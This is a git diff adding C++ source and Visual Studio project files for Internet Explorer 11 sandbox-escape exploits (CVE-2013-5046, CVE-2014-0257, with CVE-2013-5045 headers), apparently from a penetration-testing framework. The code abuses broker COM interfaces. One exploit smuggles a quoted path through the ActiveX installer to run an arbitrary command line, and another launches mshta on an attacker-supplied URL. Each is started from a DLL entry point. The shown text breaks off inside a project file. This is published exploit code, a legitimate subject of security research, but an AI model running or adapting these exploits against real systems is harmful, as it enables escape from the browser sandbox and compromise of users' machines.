0000000000..562cb0adb0 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h @@ -0,0 +1,11 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <windows.h> +#include <Utils.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp new file mode 100755 index 0000000000..4a6fab2bff --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp @@ -0,0 +1,127 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <Utils.h> +#include <Shlwapi.h> + +#pragma comment(lib, "shlwapi.lib") + +typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker); + +void DoAXExploit() +{ + try + { + HRESULT ret = E_FAIL; + + IIEUserBrokerPtr broker = CreateBroker(); + + DebugPrintf("Created User Broker: %p\n", broker); + + IIEAxInstallBrokerBrokerPtr axInstallBroker = broker; + + DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker); + + IUnknownPtr unk; + + ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk); + if (FAILED(ret)) + { + DebugPrintf("Failed to create install broker\n"); + throw _com_error(ret); + } + + IIeAxiAdminInstallerPtr admin = unk; + + bstr_t sessionGuid; + bstr_t empty; + + ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress()); + if (FAILED(ret)) + { + DebugPrintf("Failed initialize admin interface\n"); + throw _com_error(ret); + } + + DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR()); + + IIeAxiInstaller2Ptr installer = unk; + + DebugPrintf("Installer: %p", installer); + + unsigned char* details = nullptr; + unsigned int detailsLength = 0; + + CLSID mgrclsid; + + // Not important really + CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid); + + /*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8"; + bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/ + + bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe"; + + bstr_t fullPath; + + // Verify a local "signed" file, doesn't really matter what, we are not going to run it + ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""), + 0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details); + + if (FAILED(ret)) + { + throw _com_error(ret); + } + + WCHAR newPath[MAX_PATH]; + + wcscpy_s(newPath, fullPath); + + PathRemoveFileSpec(newPath); + + // Install file to dummy location, use canonicalization trick to escape quotes later + ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)), + GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0); + DebugPrintf("InstallFile: %08X\n", ret); + + if (FAILED(ret)) + { + throw _com_error(ret); + } + + bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe"; + + PROCESS_INFORMATION procInfo = { 0 }; + + // Run our arbitrary command line + ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo); + } + catch (_com_error e) + { + DebugPrintf("Error: %ls\n", e.ErrorMessage()); + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(NULL); + + DoAXExploit(); + + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj new file mode 100755 index 0000000000..bde9556738 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj @@ -0,0 +1,182 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2013-5046.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp new file mode 100755 index 0000000000..11763c77a3 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// CVE-2014-0268.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h new file mode 100755 index 0000000000..3ec4541276 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h @@ -0,0 +1,12 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <windows.h> +#include <Utils.h> +#include "interfaces.h" \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp new file mode 100755 index 0000000000..aa7ce2ffac --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp @@ -0,0 +1,201 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" + +#define MAX_ENV 32767 + +#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent") + +const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}"; + +long GetSafeArrayLen(LPSAFEARRAY psa) +{ + long ubound = 0; + + SafeArrayGetUBound(psa, 1, &ubound); + + return ubound + 1; +} + +mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount) +{ + LPSAFEARRAY methods = type->GetMethods_2(); + mscorlib::_MethodInfoPtr ret; + LONG methodCount = GetSafeArrayLen(methods); + + for (long i = 0; i < methodCount; ++i) + { + IUnknown* v = nullptr; + + if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v))) + { + mscorlib::_MethodInfoPtr method = v; + + bstr_t name = method->Getname(); + LPSAFEARRAY params = method->GetParameters(); + long paramCount = GetSafeArrayLen(params); + + if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount) + { + ret = method; + break; + } + } + } + + SafeArrayDestroy(methods); + + return ret; +} + +template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args) +{ + variant_t obj; + T retObj; + + SAFEARRAY * psa; + SAFEARRAYBOUND rgsabound[1]; + + rgsabound[0].lLbound = 0; + rgsabound[0].cElements = (ULONG)args.size(); + psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound); + + for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies) + { + SafeArrayPutElement(psa, &indicies, &args[indicies]); + } + + variant_t ret = method->Invoke_3(obj, psa); + + if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH)) + { + retObj = ret.punkVal; + } + + SafeArrayDestroy(psa); + + return retObj; +} + +bstr_t GetExploitUrl() +{ + WCHAR buf[MAX_ENV]; + + GetEnvironmentVariable(L"MYURL", buf, MAX_ENV); + + return buf; +} + +void DoDfsvcExploit() +{ + CLSID clsid; + + CLSIDFromString(CLSID_DFSVC, &clsid); + + DebugPrintf("Starting DFSVC Exploit\n"); + + mscorlib::_ObjectPtr obj; + + HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); + + if (FAILED(hr)) + { + WCHAR cmdline[] = L"dfsvc.exe"; + + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + + // Start dfsvc (because we can due to the ElevationPolicy) + if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, + nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) + { + CloseHandle(procInfo.hProcess); + CloseHandle(procInfo.hThread); + + // Just sleep to ensure it comes up + Sleep(4000); + hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); + } + else + { + DebugPrintf("Couldn't create service %d\n", GetLastError()); + } + } + + if (SUCCEEDED(hr)) + { + try + { + mscorlib::_TypePtr type = obj->GetType(); + + // Get type of Type (note defaults to RuntimeType then TypeInfo) + type = type->GetType()->BaseType->BaseType; + + DebugPrintf("TypeName: %ls", type->FullName.GetBSTR()); + + mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1); + + DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod); + + std::vector<variant_t> getTypeArgs; + + getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"); + + // Get process type + type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs); + + if (type) + { + mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2); + + if (startMethod) + { + std::vector<variant_t> startArgs; + + startArgs.push_back(L"mshta"); + startArgs.push_back(GetExploitUrl()); + + ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); + } + else + { + DebugPrintf("Couldn't find Start method"); + } + } + else + { + DebugPrintf("Couldn't find Process Type"); + } + } + catch (_com_error e) + { + DebugPrintf("COM Error: %ls\n", e.ErrorMessage()); + } + } + else + { + DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr); + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + DoDfsvcExploit(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj new file mode 100755 index 0000000000..2c9db40e6f --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj @@ -0,0 +1,182 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 